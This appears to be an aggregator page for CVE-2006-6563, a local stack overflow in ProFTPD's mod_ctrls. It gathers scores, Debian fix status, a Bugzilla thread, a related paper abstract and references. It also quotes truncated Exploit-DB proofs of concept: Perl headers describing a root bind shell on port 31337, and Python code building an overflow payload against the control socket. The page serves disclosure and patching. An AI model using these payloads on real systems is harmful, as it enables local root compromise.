CVE-2006-6563
Published: 2006-12-15
Priority: P3 37 · medium · 6.6 (CVSS 2.0)
CVSS 2.0 vector: AV:L/AC:M/Au:S/C:C/I:C/A:C
Exploit: available
EPSS: 2.30% (81.1th percentile)
Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | proftpd-dfsg | < proftpd-dfsg 1.3.0-17 (bookworm) | proftpd-dfsg 1.3.0-17 (bookworm) |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
CVSS provenance
| Source | Score | Severity | Vector |
|---|---|---|---|
| nvd (v2.0) | 6.6 | MEDIUM | AV:L/AC:M/Au:S/C:C/I:C/A:C |
| osv | 6.6 | MEDIUM | — |
| vendor_debian | 6.6 | MEDIUM | — |
GHSA
GHSA-gw7g-g6w4-pgq8: Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls
ghsa_unreviewed·2022-05-01
CVE-2006-6563 [MEDIUM] GHSA-gw7g-g6w4-pgq8: Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls
Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
OSV
CVE-2006-6563: Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls
osv·2006-12-15·CVSS 6.6
CVE-2006-6563 [MEDIUM] CVE-2006-6563: Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls
Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
Debian
CVE-2006-6563: proftpd-dfsg - Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in ...
vendor_debian·2006·CVSS 6.6
CVE-2006-6563 [MEDIUM] CVE-2006-6563: proftpd-dfsg - Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in ...
Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
Scope: local
bookworm: resolved (fixed in 1.3.0-17)
bullseye: resolved (fixed in 1.3.0-17)
forky: resolved (fixed in 1.3.0-17)
sid: resolved (fixed in 1.3.0-17)
trixie: resolved (fixed in 1.3.0-17)
No detection rules found.
Exploit-DB
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)
exploitdb·2007-02-19
CVE-2006-6563 ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)
---
#!/usr/bin/perl -w
#
# $Id: revenge_proftpd_ctrls_26.pl, v1.1 2007/02/18 19:30:25 revenge Exp $
#
# ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
#
# Original Advisory :
# http://www.coresecurity.com/?action=item&id=1594
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.6 exploitation against gcc 4.x
# Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
# I was able to use only a as payload since a normal (setuid + execve) seems that doesn't work
#
# Tested against:
# - ProFTPD 1.3.0/1.3.0a on Ubuntu 6.10 compiled with gcc 4.1.2
# - ProFTPD 1.3.0/1.3.
Exploit-DB
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)
exploitdb·2007-02-18
CVE-2006-6563 ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)
---
#!/usr/bin/perl -w
#
# $Id: revenge_proftpd_ctrls_24.pl, v1.0 2007/02/18 19:24:22 revenge Exp $
#
# ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
# [Old style school sploit against gcc 3.x and linux kernel 2.4]
#
# Original Advisory :
# http://www.coresecurity.com/?action=item&id=1594
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.4 exploitation against gcc 3.x
# Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
# I was able to use only a as payload since a normal setuid + execve seems that doesn't work
#
# Tested against:
# - ProFTPD 1.3.0/1.3.0
Exploit-DB
ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC)
exploitdb·2006-12-13
CVE-2006-6563 ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC)
ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC)
---
# Core Security Technologies - Corelabs Advisory
# ProFTPD Controls buffer overflow
import socket
import os, os.path,stat
#This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (ubuntu edgy)
#
ctrlSocket = "/tmp/ctrls.sock"
mySocket = "/tmp/notused.sock"
canary = "\0\0\x0a\xff"
trampoline = "\x77\xe7\xff\xff" # jmp ESP on vdso
shellcode = "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" # inocuous "int 3"
#Build Payload. The format on the stack is:
#
#AAAA = EBX BBBB = ESI CCCC = EDI DDDD = EBP EEEE = EIP
payload = ("A"*512) + canary + "AAAABBBBCCCCDDDD" + trampoline + shellcode
#Setup socket
#
if os.path.exists(mySocket):
    os.remove(mySocket)
s = socket.socket(socket.AF_UNIX,socket.SOCK_STREAM)
s.bind(mySocket)
os.
Exploit-DB
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow
exploitdb·2004-08-13
CVE-2006-6563 ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow
---
/*
* This is simple local exploit (Proof of Concept?) for local bug in ProFTPd
* not in default options (must be configured with option --enable-ctrls).
* Bug exists in function pr_ctrls_connect() in file "src/ctrls.c", look:
*
* "src/ctrls.c"
* int pr_ctrls_connect(const char *socket_file) {
* ...
* struct sockaddr_un cl_sock, ctrl_sock;
*
* ...
* ...
* memset(&ctrl_sock, 0, sizeof(ctrl_sock));
* ...
* ...
* strncpy(ctrl_sock.sun_path, socket_file, strlen(socket_file));
* ...
* ...
* }
*
* As we can see, there is a bad call to function strncpy(). Now look here
* at how the structure sockaddr_un looks:
*
* "/usr/include/X11/Xos.h"
* ...
* ...
* #define X_NO_SYS_UN 1
*
* struct sockaddr_un {
* short sun_family;
* char sun_path[108];
* };
*
arXiv
ShadowBound: Efficient Heap Memory Protection Through Advanced Metadata Management and Customized Compiler Optimization
arxiv_fulltext·2024-09-23
ShadowBound: Efficient Heap Memory Protection Through Advanced Metadata Management and Customized Compiler Optimization
Zheng Yu
Northwestern University
Ganxiang Yang
Northwestern University
Xinyu Xing
Northwestern University
### Abstract
In software development, the prevalence of unsafe languages such as C and C++ introduces potential vulnerabilities, especially within the heap, a pivotal component for dynamic memory allocation. Despite its significance, heap management complexities have made heap corruption pervasive, posing severe threats to system security. While prior solutions aiming for temporal and spatial memory safety exhibit overheads deemed impractical, we present ShadowBound, a unique heap memory protection design. At its core, ShadowBound is an efficient out-of-bounds defe
Bugzilla
CVE-2006-6563: proftpd < 1.3.1rc1 mod_ctrls buffer overflow
bugzilla·2006-12-17·CVSS 6.6
CVE-2006-6563 [MEDIUM] CVE-2006-6563: proftpd < 1.3.1rc1 mod_ctrls buffer overflow
CVE-2006-6563: proftpd < 1.3.1rc1 mod_ctrls buffer overflow
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-6563
"Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in
the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute
arbitrary code via a large reqarglen length value."
All FC-3+ releases possibly affected.
Discussion:
It seems like the 1.3.0 + patches from devel, FC-6 and FC-5 might not be
affected. Still, I'd like to try this release candidate and eventually deploy
it, but it fails to build on FC-6 with errors very early in the builds... *sigh*
I'll have a look at it when I have time, and make it high priority if anyone
confirms that the current builds are vulnerable.
---
1.3.1rc1 builds for me on fc6
Configured as
./configure --l
References
- http://secunia.com/advisories/23371
- http://secunia.com/advisories/23392
- http://secunia.com/advisories/23473
- http://secunia.com/advisories/24163
- http://security.gentoo.org/glsa/glsa-200702-02.xml
- http://www.coresecurity.com/?module=ContentMod&action=item&id=1594
- http://www.mandriva.com/security/advisories?name=MDKSA-2006:232
- http://www.openpkg.com/security/advisories/OpenPKG-SA-2006.039.html
- http://www.proftpd.org/docs/NEWS-1.3.1rc1
- http://www.securityfocus.com/archive/1/454320/100/0/threaded
- http://www.securityfocus.com/archive/1/460648/100/0/threaded
- http://www.securityfocus.com/archive/1/460756/100/0/threaded
- http://www.securityfocus.com/bid/21587
- http://www.trustix.org/errata/2006/0074/
- http://www.vupen.com/english/advisories/2006/4998
- https://exchange.xforce.ibmcloud.com/vulnerabilities/30906
- https://www.exploit-db.com/exploits/3330